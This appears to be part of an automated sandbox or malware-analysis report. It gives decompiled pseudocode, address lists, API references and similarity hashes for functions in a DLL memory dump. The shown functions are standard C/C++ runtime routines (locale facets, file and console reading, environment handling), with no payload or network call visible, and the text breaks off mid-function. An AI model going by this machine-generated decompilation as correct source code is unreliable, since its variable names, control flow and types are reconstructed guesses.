				intOrPtr _v44;
				char _v56;
				signed int _t39;
				char _t43;
				void* _t50;
				void* _t77;
				signed int _t85;

				_push(0xffffffff);
				_push(E6E21FAE0);
				_push( *[fs:0x0]);
				_t39 =  *0x6e24b164; // 0x1dc3c76f
				_push(_t39 ^ _t85);
				 *[fs:0x0] =  &_v16;
				E6E2017C2( &_v40, 0);
				_v8 = 0;
				_t43 =  *0x6e2e2c90; // 0x0
				_v20 = _t43;
				_v36 = E6E1FB050(0x6e2e2c78);
				_v28 = E6E1FE8D0(_a4, _v36);
				if(_v28 == 0) {
					if(_v20 == 0) {
						_t50 = E6E1FE650(__ebx, _t77, __edi, __esi,  &_v20, _a4);
						__eflags = _t50 - 0xffffffff;
						if(_t50 != 0xffffffff) {
							_v24 = _v20;
							E6E1F8AE0(_v24);
							_v8 = 1;
							E6E201E08(__eflags, _v24);
							 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 4))))();
							 *0x6e2e2c90 = _v20;
							_v28 = _v20;
							E6E2013F0( &_v32);
							_v8 = 0;
							E6E1FA830( &_v32);
						} else {
							E6E1FA1E0( &_v56);
							E6E2059BC( &_v56, 0x6e248e6c);
						}
					} else {
						_v28 = _v20;
					}
				}
				_v44 = _v28;
				_v8 = 0xffffffff;
				E6E20181A( &_v40);
				 *[fs:0x0] = _v16;
				return _v44;
			}


















    0x6e1f9873
    0x6e1f9875
    0x6e1f9880
    0x6e1f9884
    0x6e1f988b
    0x6e1f988f
    0x6e1f989a
    0x6e1f989f
    0x6e1f98a6
    0x6e1f98ab
    0x6e1f98b8
    0x6e1f98c7
    0x6e1f98ce
    0x6e1f98d8
    0x6e1f98ea
    0x6e1f98f2
    0x6e1f98f5
    0x6e1f9912
    0x6e1f991c
    0x6e1f9921
    0x6e1f9929
    0x6e1f993c
    0x6e1f9941
    0x6e1f994a
    0x6e1f9950
    0x6e1f9955
    0x6e1f995c
    0x6e1f98f7
    0x6e1f98fa
    0x6e1f9908
    0x6e1f9908
    0x6e1f98da
    0x6e1f98dd
    0x6e1f98dd
    0x6e1f98d8
    0x6e1f9964
    0x6e1f9967
    0x6e1f9971
    0x6e1f997c
    0x6e1f9987

    APIs
    • std::_Lockit::_Lockit.LIBCPMT ref: 6E1F989A
    • int.LIBCPMTD ref: 6E1F98B3
      • Part of subcall function 6E1FB050: std::_Lockit::_Lockit.LIBCPMT ref: 6E1FB066
      • Part of subcall function 6E1FB050: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1FB090
    • messages.LIBCPMTD ref: 6E1F98EA
    • std::bad_alloc::bad_alloc.LIBCMTD ref: 6E1F98FA
    • __CxxThrowException@8.LIBVCRUNTIME ref: 6E1F9908
    • std::_Lockit::~_Lockit.LIBCPMT ref: 6E1F9971
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Lockitstd::_$Lockit::_Lockit::~_$Exception@8Throwmessagesstd::bad_alloc::bad_alloc
    • String ID: x,.n
    • API String ID: 2603189070-529903000
    • Opcode ID: 656e3878b22a59369ba312113df480f92593aad876cbaf22d2761e8e575b1703
    • Instruction ID: 38f2ddcb1fee2187a938e78b5680864228973b8b6be9895bfe42b38a7f5895fb
    • Opcode Fuzzy Hash: 656e3878b22a59369ba312113df480f92593aad876cbaf22d2761e8e575b1703
    • Instruction Fuzzy Hash: A2310AB5D0420DDFCB04DFE4C991AEEB7B5BB48314F204A19E526A7280DB346A85DBE1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1F9990, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 85COMMON
    Download Yara Rule
    C-Code - Quality: 85%
    			E6E1F9990(void* __edi, void* __eflags, intOrPtr _a4) {
				char _v8;
				char _v16;
				void* _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v44;
				char _v56;
				signed int _t39;
				char _t43;
				void* _t50;
				void* _t61;
				void* _t77;
				void* _t84;
				signed int _t85;

				_push(0xffffffff);
				_push(E6E21FAE0);
				_push( *[fs:0x0]);
				_t39 =  *0x6e24b164; // 0x1dc3c76f
				_push(_t39 ^ _t85);
				 *[fs:0x0] =  &_v16;
				E6E2017C2( &_v40, 0);
				_v8 = 0;
				_t43 =  *0x6e2e2c94; // 0x0
				_v20 = _t43;
				_v36 = E6E1FB050(0x6e2e2c7c);
				_v28 = E6E1FE8D0(_a4, _v36);
				if(_v28 == 0) {
					if(_v20 == 0) {
						_t50 = E6E1FE740(_t61, _t77, __edi, _t84,  &_v20, _a4);
						__eflags = _t50 - 0xffffffff;
						if(_t50 != 0xffffffff) {
							_v24 = _v20;
							E6E1F8AE0(_v24);
							_v8 = 1;
							E6E201E08(__eflags, _v24);
							 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 4))))();
							 *0x6e2e2c94 = _v20;
							_v28 = _v20;
							E6E2013F0( &_v32);
							_v8 = 0;
							E6E1FA830( &_v32);
						} else {
							E6E1FA1E0( &_v56);
							E6E2059BC( &_v56, 0x6e248e6c);
						}
					} else {
						_v28 = _v20;
					}
				}
				_v44 = _v28;
				_v8 = 0xffffffff;
				E6E20181A( &_v40);
				 *[fs:0x0] = _v16;
				return _v44;
			}




















    0x6e1f9993
    0x6e1f9995
    0x6e1f99a0
    0x6e1f99a4
    0x6e1f99ab
    0x6e1f99af
    0x6e1f99ba
    0x6e1f99bf
    0x6e1f99c6
    0x6e1f99cb
    0x6e1f99d8
    0x6e1f99e7
    0x6e1f99ee
    0x6e1f99f8
    0x6e1f9a0a
    0x6e1f9a12
    0x6e1f9a15
    0x6e1f9a32
    0x6e1f9a3c
    0x6e1f9a41
    0x6e1f9a49
    0x6e1f9a5c
    0x6e1f9a61
    0x6e1f9a6a
    0x6e1f9a70
    0x6e1f9a75
    0x6e1f9a7c
    0x6e1f9a17
    0x6e1f9a1a
    0x6e1f9a28
    0x6e1f9a28
    0x6e1f99fa
    0x6e1f99fd
    0x6e1f99fd
    0x6e1f99f8
    0x6e1f9a84
    0x6e1f9a87
    0x6e1f9a91
    0x6e1f9a9c
    0x6e1f9aa7

    APIs
    • std::_Lockit::_Lockit.LIBCPMT ref: 6E1F99BA
    • int.LIBCPMTD ref: 6E1F99D3
      • Part of subcall function 6E1FB050: std::_Lockit::_Lockit.LIBCPMT ref: 6E1FB066
      • Part of subcall function 6E1FB050: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1FB090
    • numpunct.LIBCPMTD ref: 6E1F9A0A
    • std::bad_alloc::bad_alloc.LIBCMTD ref: 6E1F9A1A
    • __CxxThrowException@8.LIBVCRUNTIME ref: 6E1F9A28
    • std::_Lockit::~_Lockit.LIBCPMT ref: 6E1F9A91
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Lockitstd::_$Lockit::_Lockit::~_$Exception@8Thrownumpunctstd::bad_alloc::bad_alloc
    • String ID: |,.n
    • API String ID: 2683378708-2432121551
    • Opcode ID: 16bd551d1f1b9e7e11c08fe8c6c701f92f81132ff17ddf669766cc77996ef073
    • Instruction ID: 3f970dd14d6e8baf848fe53dfd8ef84ba07923c8c1ae912e3eb3ab8880d255fa
    • Opcode Fuzzy Hash: 16bd551d1f1b9e7e11c08fe8c6c701f92f81132ff17ddf669766cc77996ef073
    • Instruction Fuzzy Hash: 633108B5D00209DFCB04DFE4C991AEEBBB5FF58314F204A19E415A7280DB346A85DBE1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E21538F, Relevance: 13.8, APIs: 9, Instructions: 300COMMON
    Download Yara Rule
    C-Code - Quality: 77%
    			E6E21538F(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t143;
				signed int _t145;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed char _t157;
				unsigned int _t158;
				intOrPtr _t162;
				void* _t163;
				signed int _t164;
				signed int _t167;
				long _t168;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t178;
				signed int _t180;
				signed int _t184;
				char _t191;
				char* _t192;
				char _t199;
				char* _t200;
				signed char _t211;
				signed int _t213;
				long _t215;
				signed int _t216;
				char _t218;
				signed char _t222;
				signed int _t223;
				unsigned int _t224;
				intOrPtr _t225;
				unsigned int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed char _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t248;
				void* _t249;

				_t213 = _a4;
				if(_t213 != 0xfffffffe) {
					__eflags = _t213;
					if(_t213 < 0) {
						L58:
						_t143 = E6E20BB6B();
						 *_t143 =  *_t143 & 0x00000000;
						__eflags =  *_t143;
						 *((intOrPtr*)(E6E20BB7E())) = 9;
						L59:
						_t145 = E6E208929();
						goto L60;
					}
					__eflags = _t213 -  *0x6e2e38b0; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_v24 = 1;
					_t239 = _t213 >> 6;
					_t235 = (_t213 & 0x0000003f) * 0x30;
					_v20 = _t239;
					_t149 =  *((intOrPtr*)(0x6e2e36b0 + _t239 * 4));
					_v28 = _t235;
					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
					_v5 = _t222;
					__eflags = _t222 & 0x00000001;
					if((_t222 & 0x00000001) == 0) {
						goto L58;
					}
					_t223 = _a12;
					__eflags = _t223 - 0x7fffffff;
					if(_t223 <= 0x7fffffff) {
						__eflags = _t223;
						if(_t223 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
						_v5 = _t153;
						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
						_t246 = 0;
						_t155 = _t153 - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t236 = _v24;
							_t157 =  !_t223;
							__eflags = _t236 & _t157;
							if((_t236 & _t157) != 0) {
								_t158 = 4;
								_t224 = _t223 >> 1;
								_v16 = _t158;
								__eflags = _t224 - _t158;
								if(_t224 >= _t158) {
									_t158 = _t224;
									_v16 = _t224;
								}
								_t246 = E6E20FBEC(_t224, _t158);
								E6E20FBB2(0);
								E6E20FBB2(0);
								_t249 = _t248 + 0xc;
								_v12 = _t246;
								__eflags = _t246;
								if(_t246 != 0) {
									_t162 = E6E2158E2(_t213, 0, 0, _v24);
									_t225 =  *((intOrPtr*)(0x6e2e36b0 + _t239 * 4));
									_t248 = _t249 + 0x10;
									_t240 = _v28;
									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
									_t163 = _t246;
									 *(_t240 + _t225 + 0x24) = _t236;
									_t235 = _t240;
									_t223 = _v16;
									L21:
									_t241 = 0;
									_v40 = _t163;
									_t215 =  *((intOrPtr*)(0x6e2e36b0 + _v20 * 4));
									_v36 = _t215;
									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
									_t216 = _a4;
									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
										_v6 = _t218;
										__eflags = _t218 - 0xa;
										_t216 = _a4;
										if(_t218 != 0xa) {
											__eflags = _t223;
											if(_t223 != 0) {
												_t241 = _v24;
												 *_t163 = _v6;
												_t216 = _a4;
												_t232 = _t223 - 1;
												__eflags = _v5;
												_v12 = _t163 + 1;
												_v16 = _t232;
												 *((char*)(_t235 +  *((intOrPtr*)(0x6e2e36b0 + _v20 * 4)) + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x6e2e36b0 + _v20 * 4)) + 0x2b));
													_v6 = _t191;
													__eflags = _t191 - 0xa;
													if(_t191 != 0xa) {
														__eflags = _t232;
														if(_t232 != 0) {
															_t192 = _v12;
															_t241 = 2;
															 *_t192 = _v6;
															_t216 = _a4;
															_t233 = _t232 - 1;
															_v12 = _t192 + 1;
															_v16 = _t233;
															 *((char*)(_t235 +  *((intOrPtr*)(0x6e2e36b0 + _v20 * 4)) + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x6e2e36b0 + _v20 * 4)) + 0x2c));
																_v6 = _t199;
																__eflags = _t199 - 0xa;
																if(_t199 != 0xa) {
																	__eflags = _t233;
																	if(_t233 != 0) {
																		_t200 = _v12;
																		_t241 = 3;
																		 *_t200 = _v6;
																		_t216 = _a4;
																		_t234 = _t233 - 1;
																		__eflags = _t234;
																		_v12 = _t200 + 1;
																		_v16 = _t234;
																		 *((char*)(_t235 +  *((intOrPtr*)(0x6e2e36b0 + _v20 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t164 = E6E21AF38(_t216);
									__eflags = _t164;
									if(_t164 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
										__eflags = _t167;
										if(_t167 == 0) {
											L53:
											_t168 = GetLastError();
											_t241 = 5;
											__eflags = _t168 - _t241;
											if(_t168 != _t241) {
												__eflags = _t168 - 0x6d;
												if(_t168 != 0x6d) {
													L37:
													E6E20BB48(_t168);
													goto L38;
												}
												_t242 = 0;
												goto L39;
											}
											 *((intOrPtr*)(E6E20BB7E())) = 9;
											 *(E6E20BB6B()) = _t241;
											goto L38;
										}
										_t229 = _a12;
										__eflags = _v36 - _t229;
										if(_v36 > _t229) {
											goto L53;
										}
										_t242 = _t241 + _v36;
										__eflags = _t242;
										L45:
										_t237 = _v28;
										_t175 =  *((intOrPtr*)(0x6e2e36b0 + _v20 * 4));
										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t242 >> 1);
												_push(_v40);
												_push(_t216);
												if(_v24 == 0) {
													_t176 = E6E214EEB();
												} else {
													_t176 = E6E2151FB();
												}
											} else {
												_t230 = _t229 >> 1;
												__eflags = _t229 >> 1;
												_t176 = E6E2150AB(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
											}
											_t242 = _t176;
										}
										goto L39;
									}
									_t231 = _v28;
									_t178 =  *((intOrPtr*)(0x6e2e36b0 + _v20 * 4));
									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
										goto L41;
									}
									_t180 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t180;
									if(_t180 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
									__eflags = _t184;
									if(_t184 != 0) {
										_t229 = _a12;
										_t242 = _t241 + _v36 * 2;
										goto L45;
									}
									_t168 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(E6E20BB7E())) = 0xc;
									 *(E6E20BB6B()) = 8;
									L38:
									_t242 = _t241 | 0xffffffff;
									__eflags = _t242;
									L39:
									E6E20FBB2(_t246);
									return _t242;
								}
							}
							L15:
							 *(E6E20BB6B()) =  *_t206 & _t246;
							 *((intOrPtr*)(E6E20BB7E())) = 0x16;
							E6E208929();
							goto L38;
						}
						__eflags = _t155 != 1;
						if(_t155 != 1) {
							L13:
							_t163 = _a8;
							_v16 = _t223;
							_v12 = _t163;
							goto L21;
						}
						_t211 =  !_t223;
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(E6E20BB6B()) =  *_t151 & 0x00000000;
					 *((intOrPtr*)(E6E20BB7E())) = 0x16;
					goto L59;
				} else {
					 *(E6E20BB6B()) =  *_t212 & 0x00000000;
					_t145 = E6E20BB7E();
					 *_t145 = 9;
					L60:
					return _t145 | 0xffffffff;
				}
			}



























































    0x6e215398
    0x6e21539f
    0x6e2153b9
    0x6e2153bb
    0x6e215723
    0x6e215723
    0x6e215728
    0x6e215728
    0x6e215730
    0x6e215736
    0x6e215736
    0x00000000
    0x6e215736
    0x6e2153c1
    0x6e2153c7
    0x00000000
    0x00000000
    0x6e2153cf
    0x6e2153db
    0x6e2153de
    0x6e2153e1
    0x6e2153e4
    0x6e2153eb
    0x6e2153ee
    0x6e2153f2
    0x6e2153f5
    0x6e2153f8
    0x00000000
    0x00000000
    0x6e2153fe
    0x6e215401
    0x6e215407
    0x6e215421
    0x6e215423
    0x6e21571f
    0x00000000
    0x6e21571f
    0x6e215429
    0x6e21542d
    0x00000000
    0x00000000
    0x6e215433
    0x6e215437
    0x00000000
    0x00000000
    0x6e21543e
    0x6e215442
    0x6e215445
    0x6e215448
    0x6e21544d
    0x6e21544d
    0x6e215450
    0x6e21546d
    0x6e215472
    0x6e215474
    0x6e215476
    0x6e215496
    0x6e215497
    0x6e215499
    0x6e21549c
    0x6e21549e
    0x6e2154a0
    0x6e2154a2
    0x6e2154a2
    0x6e2154ad
    0x6e2154af
    0x6e2154b6
    0x6e2154bb
    0x6e2154be
    0x6e2154c1
    0x6e2154c3
    0x6e2154e8
    0x6e2154ed
    0x6e2154f4
    0x6e2154f7
    0x6e2154fa
    0x6e2154fe
    0x6e215500
    0x6e215504
    0x6e215506
    0x6e215509
    0x6e21550c
    0x6e21550e
    0x6e215511
    0x6e215518
    0x6e21551b
    0x6e215520
    0x6e215523
    0x6e21552c
    0x6e215530
    0x6e215533
    0x6e215536
    0x6e215539
    0x6e21553f
    0x6e215541
    0x6e21554a
    0x6e21554d
    0x6e215550
    0x6e215553
    0x6e215554
    0x6e215558
    0x6e21555e
    0x6e215568
    0x6e21556d
    0x6e21557d
    0x6e215581
    0x6e215584
    0x6e215586
    0x6e215588
    0x6e21558a
    0x6e21558c
    0x6e215594
    0x6e215595
    0x6e215598
    0x6e21559b
    0x6e21559c
    0x6e2155a2
    0x6e2155ac
    0x6e2155b4
    0x6e2155b7
    0x6e2155c3
    0x6e2155c7
    0x6e2155ca
    0x6e2155cc
    0x6e2155ce
    0x6e2155d0
    0x6e2155d2
    0x6e2155da
    0x6e2155db
    0x6e2155de
    0x6e2155e1
    0x6e2155e1
    0x6e2155e2
    0x6e2155e8
    0x6e2155f2
    0x6e2155f2
    0x6e2155d0
    0x6e2155cc
    0x6e2155b7
    0x6e21558a
    0x6e215586
    0x6e21556d
    0x6e215541
    0x6e215539
    0x6e2155f8
    0x6e2155fe
    0x6e215600
    0x6e215673
    0x6e215673
    0x6e215677
    0x6e215687
    0x6e21568d
    0x6e21568f
    0x6e2156eb
    0x6e2156eb
    0x6e2156f3
    0x6e2156f4
    0x6e2156f6
    0x6e21570f
    0x6e215712
    0x6e21564f
    0x6e215650
    0x00000000
    0x6e215655
    0x6e215718
    0x00000000
    0x6e215718
    0x6e2156fd
    0x6e215708
    0x00000000
    0x6e215708
    0x6e215691
    0x6e215694
    0x6e215697
    0x00000000
    0x00000000
    0x6e215699
    0x6e215699
    0x6e21569c
    0x6e21569f
    0x6e2156a2
    0x6e2156a9
    0x6e2156ae
    0x6e2156b0
    0x6e2156b4
    0x6e2156cf
    0x6e2156d3
    0x6e2156d4
    0x6e2156d7
    0x6e2156d8
    0x6e2156e4
    0x6e2156da
    0x6e2156da
    0x6e2156da
    0x6e2156b6
    0x6e2156b6
    0x6e2156b6
    0x6e2156c1
    0x6e2156c6
    0x6e2156c9
    0x6e2156c9
    0x00000000
    0x6e2156ae
    0x6e215605
    0x6e215608
    0x6e21560f
    0x6e215614
    0x00000000
    0x00000000
    0x6e21561d
    0x6e215623
    0x6e215625
    0x00000000
    0x00000000
    0x6e215627
    0x6e21562b
    0x00000000
    0x00000000
    0x6e21563f
    0x6e215645
    0x6e215647
    0x6e21566b
    0x6e21566e
    0x00000000
    0x6e21566e
    0x6e215649
    0x00000000
    0x6e2154c5
    0x6e2154ca
    0x6e2154d5
    0x6e215656
    0x6e215656
    0x6e215656
    0x6e215659
    0x6e21565a
    0x00000000
    0x6e215662
    0x6e2154c3
    0x6e215478
    0x6e21547d
    0x6e215484
    0x6e21548a
    0x00000000
    0x6e21548a
    0x6e215452
    0x6e215455
    0x6e21545f
    0x6e21545f
    0x6e215462
    0x6e215465
    0x00000000
    0x6e215465
    0x6e215459
    0x6e21545b
    0x6e21545d
    0x00000000
    0x00000000
    0x00000000
    0x6e21545d
    0x6e215409
    0x6e21540e
    0x6e215416
    0x00000000
    0x6e2153a1
    0x6e2153a6
    0x6e2153a9
    0x6e2153ae
    0x6e21573b
    0x00000000
    0x6e21573b

    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: eceb63a97658c73534884f05b19db9cc32661bb64957fadde1da2740af68b324
    • Instruction ID: e613b24d1be5e7f875f7a83f9408a302cd4715c75c6972866c4573d143765a9e
    • Opcode Fuzzy Hash: eceb63a97658c73534884f05b19db9cc32661bb64957fadde1da2740af68b324
    • Instruction Fuzzy Hash: FFC1BF7498828EAFDB118FE8C855BDDBBF6BF0A311F0400C5DA50A7395C7749A41CB60
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E2191FB, Relevance: 13.7, APIs: 9, Instructions: 209COMMON
    Download Yara Rule
    C-Code - Quality: 82%
    			E6E2191FB(signed int _a4, signed int _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				signed int _t68;
				signed int _t69;
				signed int _t73;
				signed int* _t75;
				signed int _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed int _t91;
				signed int _t98;
				intOrPtr* _t99;
				signed int _t108;
				signed int _t109;
				signed int _t111;
				signed int _t112;
				intOrPtr _t115;
				void* _t119;
				signed int _t121;
				void* _t124;
				signed int _t125;
				signed int _t126;
				void* _t131;
				intOrPtr* _t135;
				signed int _t139;
				signed int _t141;
				void* _t142;
				void* _t143;
				signed int _t144;
				signed int _t146;
				signed int* _t147;
				signed int _t152;
				signed int _t153;
				CHAR* _t154;
				signed int _t155;
				signed int* _t156;
				signed int _t157;
				signed int _t159;
				void* _t164;
				void* _t166;
				void* _t167;

				_t111 = _a4;
				if(_t111 != 0) {
					_t144 = _t111;
					_t58 = E6E21F850(_t111, 0x3d);
					_v16 = _t58;
					_t119 = _t143;
					__eflags = _t58;
					if(_t58 == 0) {
						L10:
						 *((intOrPtr*)(E6E20BB7E())) = 0x16;
						goto L11;
					} else {
						__eflags = _t58 - _t111;
						if(_t58 == _t111) {
							goto L10;
						} else {
							__eflags =  *((char*)(_t58 + 1));
							_t152 =  *0x6e2e3670; // 0x2b246f0
							_t62 = _t58 & 0xffffff00 |  *((char*)(_t58 + 1)) == 0x00000000;
							_v5 = _t62;
							__eflags = _t152 -  *0x6e2e367c; // 0x2b246f0
							if(__eflags == 0) {
								L44();
								_t152 = _t62;
								_t62 = _v5;
								_t119 = _t152;
								 *0x6e2e3670 = _t152;
							}
							_t112 = 0;
							__eflags = _t152;
							if(_t152 != 0) {
								L21:
								_t121 = _t144;
								_t64 = _v16 - _t121;
								_push(_t64);
								_push(_t121);
								L61();
								_v12 = _t64;
								__eflags = _t64;
								if(_t64 < 0) {
									L29:
									__eflags = _v5 - _t112;
									if(_v5 != _t112) {
										goto L12;
									} else {
										_t65 =  ~_t64;
										_v12 = _t65;
										_t27 = _t65 + 2; // 0x2
										_t124 = _t27;
										__eflags = _t124 - _t65;
										if(_t124 < _t65) {
											goto L11;
										} else {
											__eflags = _t124 - 0x3fffffff;
											if(_t124 >= 0x3fffffff) {
												goto L11;
											} else {
												_push(4);
												_push(_t124);
												_t153 = E6E219546(_t152);
												E6E20FBB2(_t112);
												_t166 = _t166 + 0x10;
												__eflags = _t153;
												if(_t153 == 0) {
													goto L11;
												} else {
													_t125 = _v12;
													_t144 = _t112;
													_t68 = _a4;
													 *(_t153 + _t125 * 4) = _t68;
													 *(_t153 + 4 + _t125 * 4) = _t112;
													goto L34;
												}
											}
										}
									}
								} else {
									__eflags =  *_t152 - _t112;
									if( *_t152 == _t112) {
										goto L29;
									} else {
										E6E20FBB2( *((intOrPtr*)(_t152 + _t64 * 4)));
										_t141 = _v12;
										__eflags = _v5 - _t112;
										if(_v5 != _t112) {
											while(1) {
												__eflags =  *(_t152 + _t141 * 4) - _t112;
												if( *(_t152 + _t141 * 4) == _t112) {
													break;
												}
												 *(_t152 + _t141 * 4) =  *(_t152 + 4 + _t141 * 4);
												_t141 = _t141 + 1;
												__eflags = _t141;
											}
											_push(4);
											_push(_t141);
											_t153 = E6E219546(_t152);
											E6E20FBB2(_t112);
											_t166 = _t166 + 0x10;
											_t68 = _t144;
											__eflags = _t153;
											if(_t153 != 0) {
												L34:
												 *0x6e2e3670 = _t153;
											}
										} else {
											_t68 = _a4;
											_t144 = _t112;
											 *(_t152 + _t141 * 4) = _t68;
										}
										__eflags = _a8 - _t112;
										if(_a8 == _t112) {
											goto L12;
										} else {
											_t126 = _t68;
											_t142 = _t126 + 1;
											do {
												_t69 =  *_t126;
												_t126 = _t126 + 1;
												__eflags = _t69;
											} while (_t69 != 0);
											_v12 = _t126 - _t142 + 2;
											_t154 = E6E20FB55(_t126 - _t142, _t126 - _t142 + 2, 1);
											_pop(_t129);
											__eflags = _t154;
											if(_t154 == 0) {
												L42:
												E6E20FBB2(_t154);
												goto L12;
											} else {
												_t73 = E6E20EBB9(_t154, _v12, _a4);
												_t167 = _t166 + 0xc;
												__eflags = _t73;
												if(_t73 != 0) {
													_push(_t112);
													_push(_t112);
													_push(_t112);
													_push(_t112);
													_push(_t112);
													E6E208956();
													asm("int3");
													_t164 = _t167;
													_push(_t144);
													_t146 = _v44;
													__eflags = _t146;
													if(_t146 != 0) {
														_t131 = 0;
														_t75 = _t146;
														__eflags =  *_t146;
														if( *_t146 != 0) {
															do {
																_t75 =  &(_t75[1]);
																_t131 = _t131 + 1;
																__eflags =  *_t75;
															} while ( *_t75 != 0);
														}
														_push(_t154);
														_t47 = _t131 + 1; // 0x2
														_t155 = E6E20FB55(_t131, _t47, 4);
														__eflags = _t155;
														if(_t155 == 0) {
															L59:
															E6E20D659(_t112, _t142, _t146, _t155);
															goto L60;
														} else {
															__eflags =  *_t146;
															if( *_t146 == 0) {
																L57:
																E6E20FBB2(0);
																_t86 = _t155;
																goto L58;
															} else {
																_push(_t112);
																_t112 = _t155 - _t146;
																__eflags = _t112;
																do {
																	_t135 =  *_t146;
																	_t48 = _t135 + 1; // 0x5
																	_t142 = _t48;
																	do {
																		_t87 =  *_t135;
																		_t135 = _t135 + 1;
																		__eflags = _t87;
																	} while (_t87 != 0);
																	_t49 = _t135 - _t142 + 1; // 0x6
																	_v12 = _t49;
																	 *(_t112 + _t146) = E6E20FB55(_t135 - _t142, _t49, 1);
																	E6E20FBB2(0);
																	_t167 = _t167 + 0xc;
																	__eflags =  *(_t112 + _t146);
																	if( *(_t112 + _t146) == 0) {
																		goto L59;
																	} else {
																		_t91 = E6E20EBB9( *(_t112 + _t146), _v12,  *_t146);
																		_t167 = _t167 + 0xc;
																		__eflags = _t91;
																		if(_t91 != 0) {
																			L60:
																			_push(0);
																			_push(0);
																			_push(0);
																			_push(0);
																			_push(0);
																			E6E208956();
																			asm("int3");
																			_push(_t164);
																			_push(_t112);
																			_push(_t155);
																			_push(_t146);
